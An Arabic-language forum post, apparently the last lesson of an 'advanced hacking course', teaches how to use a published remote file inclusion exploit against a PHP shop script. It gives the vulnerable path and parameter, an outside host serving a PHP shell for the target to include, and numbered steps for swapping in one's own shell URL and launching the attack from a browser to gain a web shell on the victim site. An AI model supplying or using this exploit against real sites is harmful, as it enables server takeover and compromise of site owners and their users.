الدرس العاشر: استغلال الثغرات المكتوبة بلغة html
أخباركمـ
نكمل علي بركة الله
طبعا كلنا او البعض منا يعرف عن انواع من الثغرات
لكن ما يعرفها كلها
يعرف ان فيه فايل انكلود وسكيول انجاكشن وكوماند اكسزيشان ...
المهمـ حتي نقدر نفهمـ كويس نستغل اي ثغرة تقابلنا
بعض اللي اكتشفوا هذة الثغرات استعملوا لغات برمجيه مثا html ..... php .... perl
حتي يطبقون عن طريقها
بشرح اليومـ استغلال ثغرات <html>
اي ثغرة تلقي بأول الصفحه هذا الكود <html> تعرف انها ثغرة من نوع الهتمل
ولو درست لغة الات تي ام ال قبل كدا بتفهمـ كويس ؟
الثغرة الموجودة بالميلورمـ
http://www.milw0rm.com/exploits/3818
راح اشرح التطبيق عليها ..
----------
<html>
بداية الصفحه
--------
Remote File Include Exploit
النوع
----
Script Name: 2005-2006 The Merchant Project
-----------
كود البحث
---------
------------
هذا اهمـ شئ وهو ثوابت الكودكود://Basic exploit,but any time : (
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
---------
كود البحثكود:var path="/help"
---------
------------
هذا اهمـ شئ وهو ثوابت الكودكود://Basic exploit,but any time : (
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
مجلد المساعده يحمل الصفحه اللي بيها الثغرةكود:var path="/help"
--------
الصفحة اللي فيها كود التغرةكود:var adres="/index.php?" //File name
--------
متغير التغرةكود:var acik ="show=" // Line x
--------
هنا نضع الشيل بين الاقواسكود:var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script
وللبحث عنوا كنترول f
ctrl+f = shll
----------
اوكـ ما فيه غموض
خطوات العمل
1- تاخد الكود الموجود بالصفحه وتحدد الكل وتنسخوا
2- تغير رابط الشي الي رابط الشيل حقك
3- تحفظوا بأمتداد html
4- نفتح الصفحه بالمتصفح عادي ونضع رابط الموقع المصاب كما بالصورة
واضغطـ اوكـ بيحملكـ الشيل بالصفحه ومبروك عليك
------
وهكذا نكون قد أنهينا الدرس العاشر والأخير من دورة الهكر المتقدمة
آمل أن تكون قد أعجبتكم وأن تكونوا أستفدتم منها ولو بالقليل
بالتوفيق
رد مع اقتباس
رد: الدرس العاشر: استغلال الثغرات المكتوبة بلغة html
المفضلات